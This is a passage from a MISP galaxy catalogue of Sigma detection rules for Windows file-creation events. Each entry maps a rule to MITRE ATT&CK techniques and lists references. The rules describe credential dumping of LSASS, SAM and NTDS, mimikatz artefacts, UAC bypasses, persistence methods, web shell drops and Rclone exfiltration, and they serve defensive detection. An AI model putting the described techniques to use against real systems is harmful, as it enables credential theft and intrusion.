Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml

Cred Dump Tools Dropped Files

Detects the creation of files with well-known filenames (parts of credential dumping software or files produced by it)

The tag is: misp-galaxy:sigma-rules="Cred Dump Tools Dropped Files"

Cred Dump Tools Dropped Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

Table 9935. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml

PowerShell Profile Modification

Detects the creation or modification of a PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence

The tag is: misp-galaxy:sigma-rules="PowerShell Profile Modification"

PowerShell Profile Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"

Table 9936. Table References

Links

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

https://persistence-info.github.io/Data/powershellprofile.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml

Installation of TeamViewer Desktop

TeamViewer_Desktop.exe is created during install

The tag is: misp-galaxy:sigma-rules="Installation of TeamViewer Desktop"

Installation of TeamViewer Desktop has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9937. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml

UAC Bypass Using .NET Code Profiler on MMC

Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using .NET Code Profiler on MMC"

UAC Bypass Using .NET Code Profiler on MMC has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9938. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml

Potential Persistence Via Microsoft Office Startup Folder

Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Microsoft Office Startup Folder"

Potential Persistence Via Microsoft Office Startup Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

Table 9939. Table References

Links

https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies

https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_startup_persistence.yml

WMI Persistence - Script Event Consumer File Write

Detects file writes of WMI script event consumer

The tag is: misp-galaxy:sigma-rules="WMI Persistence - Script Event Consumer File Write"

WMI Persistence - Script Event Consumer File Write has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9941. Table References

Links

https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml

Potential DCOM InternetExplorer.Application DLL Hijack

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network

The tag is: misp-galaxy:sigma-rules="Potential DCOM InternetExplorer.Application DLL Hijack"

Potential DCOM InternetExplorer.Application DLL Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 9942. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml

Suspicious desktop.ini Action

Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder’s content (i.e. renaming files) without changing them on disk.

The tag is: misp-galaxy:sigma-rules="Suspicious desktop.ini Action"

Suspicious desktop.ini Action has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

Table 9943. Table References

Links

https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml

Drop Binaries Into Spool Drivers Color Folder

Detects the creation of suspicious binary files inside the "\windows\system32\spool\drivers\color\" folder, as seen in the blog referenced below

The tag is: misp-galaxy:sigma-rules="Drop Binaries Into Spool Drivers Color Folder"

Table 9944. Table References

Links

https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml

Potential Winnti Dropper Activity

Detects files dropped by Winnti as described in RedMimicry Winnti playbook

The tag is: misp-galaxy:sigma-rules="Potential Winnti Dropper Activity"

Potential Winnti Dropper Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 9945. Table References

Links

https://redmimicry.com/posts/redmimicry-winnti/#dropper

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml

Suspicious PFX File Creation

A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.

The tag is: misp-galaxy:sigma-rules="Suspicious PFX File Creation"

Suspicious PFX File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 9946. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/6.B.1_6392C9F1-D975-4F75-8A70-433DEDD7F622.md

https://github.com/OTRF/detection-hackathon-apt29/issues/14

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_pfx_file_creation.yml

File Creation In Suspicious Directory By Msdt.EXE

Detects msdt.exe creating files in suspicious directories, which could be a sign of exploitation of either the Follina or the DogWalk vulnerability

The tag is: misp-galaxy:sigma-rules="File Creation In Suspicious Directory By Msdt.EXE"

File Creation In Suspicious Directory By Msdt.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9947. Table References

Links

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_susp_directories.yml

Suspicious DotNET CLR Usage Log Artifact

Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.

The tag is: misp-galaxy:sigma-rules="Suspicious DotNET CLR Usage Log Artifact"

Suspicious DotNET CLR Usage Log Artifact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9948. Table References

Links

https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008

https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml

https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html

https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml

Inveigh Execution Artefacts

Detects the presence and execution of Inveigh via dropped artefacts

The tag is: misp-galaxy:sigma-rules="Inveigh Execution Artefacts"

Inveigh Execution Artefacts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9949. Table References

Links

https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs

https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs

https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_inveigh_artefacts.yml

Suspicious ASPX File Drop by Exchange

Detects a suspicious file type dropped by an Exchange component in IIS into a suspicious folder

The tag is: misp-galaxy:sigma-rules="Suspicious ASPX File Drop by Exchange"

Suspicious ASPX File Drop by Exchange has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9951. Table References

Links

https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/

https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html

https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml

Adwind RAT / JRAT File Artifact

Detects javaw.exe in AppData folder as used by Adwind / JRAT

The tag is: misp-galaxy:sigma-rules="Adwind RAT / JRAT File Artifact"

Adwind RAT / JRAT File Artifact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 9952. Table References

Links

https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf

https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml

HackTool - Dumpert Process Dumper Default File

Detects the creation of the default dump file used by the Outflank Dumpert tool, a process dumper that dumps the LSASS process memory

The tag is: misp-galaxy:sigma-rules="HackTool - Dumpert Process Dumper Default File"

HackTool - Dumpert Process Dumper Default File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9953. Table References

Links

https://github.com/outflanknl/Dumpert

https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_dumpert.yml

LSASS Process Dump Artefact In CrashDumps Folder

Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.

The tag is: misp-galaxy:sigma-rules="LSASS Process Dump Artefact In CrashDumps Folder"

LSASS Process Dump Artefact In CrashDumps Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9954. Table References

Links

https://github.com/deepinstinct/Lsass-Shtinkering

https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_shtinkering.yml

Anydesk Temporary Artefact

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Anydesk Temporary Artefact"

Anydesk Temporary Artefact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9955. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml

Process Monitor Driver Creation By Non-Sysinternals Binary

Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.

The tag is: misp-galaxy:sigma-rules="Process Monitor Driver Creation By Non-Sysinternals Binary"

Process Monitor Driver Creation By Non-Sysinternals Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

Table 9956. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_procmon_driver_susp_creation.yml

Mimikatz Kirbi File Creation

Detects the creation of files produced by mimikatz, such as ".kirbi", "mimilsa.log", etc.

The tag is: misp-galaxy:sigma-rules="Mimikatz Kirbi File Creation"

Mimikatz Kirbi File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"

Table 9957. Table References

Links

https://pentestlab.blog/2019/10/21/persistence-security-support-provider/

https://cobalt.io/blog/kerberoast-attack-techniques

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_mimikatz_files.yml

PSScriptPolicyTest Creation By Uncommon Process

Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft PowerShell to test against AppLocker.

The tag is: misp-galaxy:sigma-rules="PSScriptPolicyTest Creation By Uncommon Process"

Table 9958. Table References

Links

https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ps_script_policy_test_creation_by_uncommon_process.yml

Wmiexec Default Output File

Detects the creation of the default output filename used by the wmiexec tool

The tag is: misp-galaxy:sigma-rules="Wmiexec Default Output File"

Wmiexec Default Output File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 9959. Table References

Links

https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/

https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml

RemCom Service File Creation

Detects the default RemCom service filename, which indicates RemCom service installation and execution

The tag is: misp-galaxy:sigma-rules="RemCom Service File Creation"

RemCom Service File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9960. Table References

Links

https://github.com/kavika13/RemCom/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remcom_service.yml

New Outlook Macro Created

Detects the creation of a macro file for Outlook.

The tag is: misp-galaxy:sigma-rules="New Outlook Macro Created"

New Outlook Macro Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

Table 9961. Table References

Links

https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_macro_creation.yml

Suspicious Screensaver Binary File Creation

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

The tag is: misp-galaxy:sigma-rules="Suspicious Screensaver Binary File Creation"

Suspicious Screensaver Binary File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"

Table 9962. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml

Potential Startup Shortcut Persistence Via PowerShell.EXE

Detects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"

The tag is: misp-galaxy:sigma-rules="Potential Startup Shortcut Persistence Via PowerShell.EXE"

Potential Startup Shortcut Persistence Via PowerShell.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9963. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder

https://redcanary.com/blog/intelligence-insights-october-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml

Office Macro File Creation From Suspicious Process

Detects the creation of an Office macro file from a suspicious process

The tag is: misp-galaxy:sigma-rules="Office Macro File Creation From Suspicious Process"

Office Macro File Creation From Suspicious Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 9964. Table References

Links

https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml

Dynamic CSharp Compile Artefact

When C# is compiled dynamically, a .cmdline file will be created as part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution.

The tag is: misp-galaxy:sigma-rules="Dynamic CSharp Compile Artefact"

Dynamic CSharp Compile Artefact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 9965. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml

Startup Folder File Write

A general detection for files being created in the Windows startup directory. This could be an indicator of persistence.

The tag is: misp-galaxy:sigma-rules="Startup Folder File Write"

Startup Folder File Write has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9966. Table References

Links

https://github.com/OTRF/detection-hackathon-apt29/issues/12

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml

UAC Bypass Using NTFS Reparse Point - File

Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using NTFS Reparse Point - File"

UAC Bypass Using NTFS Reparse Point - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9967. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml

NTDS Exfiltration Filename Patterns

Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.

The tag is: misp-galaxy:sigma-rules="NTDS Exfiltration Filename Patterns"

NTDS Exfiltration Filename Patterns has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9968. Table References

Links

https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1

https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb

https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml

Suspicious Interactive PowerShell as SYSTEM

Detects the creation of files that indicate interactive use of PowerShell in the SYSTEM user context

The tag is: misp-galaxy:sigma-rules="Suspicious Interactive PowerShell as SYSTEM"

Suspicious Interactive PowerShell as SYSTEM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9969. Table References

Links

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/PowerSploit_Invoke-Mimikatz.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_system_interactive_powershell.yml

UAC Bypass Using IDiagnostic Profile - File

Detects the creation of a file by "dllhost.exe" in the System32 directory as part of the "IDiagnosticProfileUAC" UAC bypass technique

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using IDiagnostic Profile - File"

UAC Bypass Using IDiagnostic Profile - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9970. Table References

Links

https://github.com/Wh04m1001/IDiagnosticProfileUAC

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml

Legitimate Application Dropped Archive

Detects programs on a Windows system that should not write an archive to disk

The tag is: misp-galaxy:sigma-rules="Legitimate Application Dropped Archive"

Legitimate Application Dropped Archive has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9971. Table References

Links

https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_archive.yml

Suspicious Desktopimgdownldr Target File

Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension

The tag is: misp-galaxy:sigma-rules="Suspicious Desktopimgdownldr Target File"

Suspicious Desktopimgdownldr Target File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9972. Table References

Links

https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/

https://twitter.com/SBousseaden/status/1278977301745741825

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml

UAC Bypass Using Consent and Comctl32 - File

Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Consent and Comctl32 - File"

UAC Bypass Using Consent and Comctl32 - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9973. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml

Potential Suspicious PowerShell Module File Created

Detects the creation of a new PowerShell module in the first folder of the module directory structure, e.g. "\WindowsPowerShell\Modules\malware\malware.psm1". This is a somewhat uncommon practice, as legitimate modules often include a version folder.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious PowerShell Module File Created"

Table 9974. Table References

Links

Internal Research

https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_susp_creation.yml

Potential SAM Database Dump

Detects the creation of files that look like exports of the local SAM (Security Account Manager)

The tag is: misp-galaxy:sigma-rules="Potential SAM Database Dump"

Potential SAM Database Dump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 9975. Table References

Links

https://github.com/cube0x0/CVE-2021-36934

https://github.com/HuskyHacks/ShadowSteal

https://www.google.com/search?q=%22reg.exe+save%22+sam

https://github.com/FireFart/hivenightmare

https://github.com/search?q=CVE-2021-36934

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml

PowerShell Script Dropped Via PowerShell.EXE

Detects PowerShell creating a PowerShell file (.ps1). While this behavior is often benign, it can sometimes be a sign of a dropper script trying to achieve persistence.

The tag is: misp-galaxy:sigma-rules="PowerShell Script Dropped Via PowerShell.EXE"

Table 9976. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_drop_powershell.yml

UAC Bypass Using MSConfig Token Modification - File

Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using MSConfig Token Modification - File"

UAC Bypass Using MSConfig Token Modification - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9977. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml

Rclone Config File Creation

Detects Rclone config files being created

The tag is: misp-galaxy:sigma-rules="Rclone Config File Creation"

Rclone Config File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 9978. Table References

Links

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_config_files.yml

Suspicious Unattend.xml File Access

Detects attempts to access unattend.xml within the Panther directory, where installation logs are stored. These answer files are used during the unattended Windows installation process and commonly contain credentials; if they still exist, their contents can be read by an attacker.

The tag is: misp-galaxy:sigma-rules="Suspicious Unattend.xml File Access"

Suspicious Unattend.xml File Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 9979. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_unattend_xml.yml

EVTX Created In Uncommon Location

Detects the creation of new files with the ".evtx" extension in uncommon locations, which could indicate tampering with the default EVTX log locations in order to evade security controls.

The tag is: misp-galaxy:sigma-rules="EVTX Created In Uncommon Location"

EVTX Created In Uncommon Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9980. Table References

Links

